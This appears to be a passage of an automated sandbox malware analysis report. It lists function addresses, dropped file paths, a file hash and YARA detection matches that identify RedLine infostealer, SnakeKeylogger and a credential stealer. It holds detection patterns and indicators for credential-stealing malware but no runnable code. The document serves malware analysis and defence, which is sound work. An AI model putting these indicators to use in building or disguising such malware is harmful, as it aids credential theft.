          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_00408C606_1_00408C60
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004182446_1_00418244
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004016506_1_00401650
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_00402F206_1_00402F20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004193C46_1_004193C4
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004187886_1_00418788
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_00402F896_1_00402F89
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_00402B906_1_00402B90
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004073A06_1_004073A0
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_028920B49_2_028920B4
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_0289CECD9_2_0289CECD
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: 9_2_0289CFC79_2_0289CFC7
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00408C6010_2_00408C60
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0040DC1110_2_0040DC11
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00407C3F10_2_00407C3F
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00418CCC10_2_00418CCC
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00406CA010_2_00406CA0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_004028B010_2_004028B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0041A4BE10_2_0041A4BE
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00408C6010_2_00408C60
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0041824410_2_00418244
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0040165010_2_00401650
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00402F2010_2_00402F20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_004193C410_2_004193C4
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0041878810_2_00418788
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00402F8910_2_00402F89
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00402B9010_2_00402B90
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_004073A010_2_004073A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3D49010_2_24A3D490
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3B4C010_2_24A3B4C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3B7A010_2_24A3B7A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3F0C810_2_24A3F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A341EA10_2_24A341EA
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3B1DF10_2_24A3B1DF
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3BD6110_2_24A3BD61
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A35E5810_2_24A35E58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3AF0010_2_24A3AF00
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A38F1810_2_24A38F18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3582010_2_24A35820
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3BA7F10_2_24A3BA7F
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3AA5810_2_24A3AA58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3D48010_2_24A3D480
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3E5E810_2_24A3E5E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3E5D910_2_24A3E5D9
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3306810_2_24A33068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_24A3AC2010_2_24A3AC20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF351010_2_25BF3510
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF856810_2_25BF8568
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF782010_2_25BF7820
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFD40010_2_25BFD400
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF004010_2_25BF0040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF074010_2_25BF0740
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF0E4010_2_25BF0E40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE9B810_2_25BFE9B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE9A810_2_25BFE9A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFB59810_2_25BFB598
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFB58A10_2_25BFB58A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFB9F010_2_25BFB9F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFB9E210_2_25BFB9E2
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE10810_2_25BFE108
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF350110_2_25BF3501
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE56010_2_25BFE560
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF855810_2_25BF8558
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE55110_2_25BFE551
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFDCB010_2_25BFDCB0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFDCA010_2_25BFDCA0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF708810_2_25BF7088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFE0F910_2_25BFE0F9
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF707810_2_25BF7078
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFD85810_2_25BFD858
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFD84A10_2_25BFD84A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFCFA810_2_25BFCFA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFCF9810_2_25BFCF98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFD3F010_2_25BFD3F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF073110_2_25BF0731
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFFB1810_2_25BFFB18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFFB0910_2_25BFFB09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFCB5010_2_25BFCB50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFCB4010_2_25BFCB40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFF6B010_2_25BFF6B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFC2A010_2_25BFC2A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFC29210_2_25BFC292
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFC6F810_2_25BFC6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFC6E910_2_25BFC6E9
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFF6C010_2_25BFF6C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFBE3A10_2_25BFBE3A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BF0E3110_2_25BF0E31
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_25BFEE1010_2_25BFEE10
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\fptrsiaN.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: String function: 0040FB9C appears 40 times
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: String function: 0040D606 appears 96 times
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: String function: 0040E1D8 appears 172 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029C424C appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029D3F1C appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029C45D0 appears 828 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029D3E98 appears 56 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029C4444 appears 245 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 029C4270 appears 31 times
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: String function: 028945D0 appears 574 times
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: String function: 028A3E98 appears 50 times
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: String function: 02894444 appears 154 times
          Source: Draft doc PI ITS15235.vbsInitial sample: Strings found which are bigger than 50
          Source: NETUTILS.dll.1.drStatic PE information: Number of sections : 19 > 10
          Source: 6.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 10.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 15.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 15.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 1.2.x.exe.213963a8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 15.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 1.2.x.exe.213d31d8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.Naisrtpf.PIF.210cab18.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 15.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.Naisrtpf.PIF.210cab18.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
